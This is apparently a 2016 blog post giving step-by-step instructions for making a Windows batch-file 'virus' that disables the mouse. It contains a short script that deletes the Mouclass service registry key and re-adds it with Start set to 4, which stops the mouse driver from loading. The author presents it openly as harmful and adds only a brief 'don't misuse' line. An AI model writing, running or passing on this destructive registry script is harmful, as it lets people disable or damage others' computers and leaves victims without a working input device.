Pages

Sunday, April 17, 2016

HOW TO MAKE A VIRUS THAT DISABLE YOUR MOUSE

Hello friends,Today i am going to tell you how to create a virus that disable your mouse.whenever this virus is execute in your system then your mouse will stop to working.This virus is created by batch programming.i had already previously posted to making some batch file like matrix effect,create folder with password,open multiple site by single click mouse button and so on.But these file is not harmful for your computer.but today i am going to tell you to create a batch file to harm your computer.This batch file is also virus which effect your system.which may be corrupt your C drive or other things.But this virus which we are learning today that effect your mouse.Today you will learn with Raj Roushan to create a virus that disable your mouse.It means your mouse will stop to working.
Steps to create your virus.
Step 1:-press win key+r to open Run.
Step 2:-Type "Notepad" in Run and press enter key.
Step 3:-copy this code in your notepad file.

               rem ---------------------------------
               rem Disable Mouse
               set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
               reg delete %key%
               reg add %key% /v Start /t REG_DWORD /d 4

               rem ---------------------------------
Step 4:-Now save this file with extension.bat for example virus.bat
Step 5:-Now open this file.your mouse will stop to working.

Note:-Don't misuse this file and before open this you must thinks to that file because it is harmful for sytem.

No comments:

Post a Comment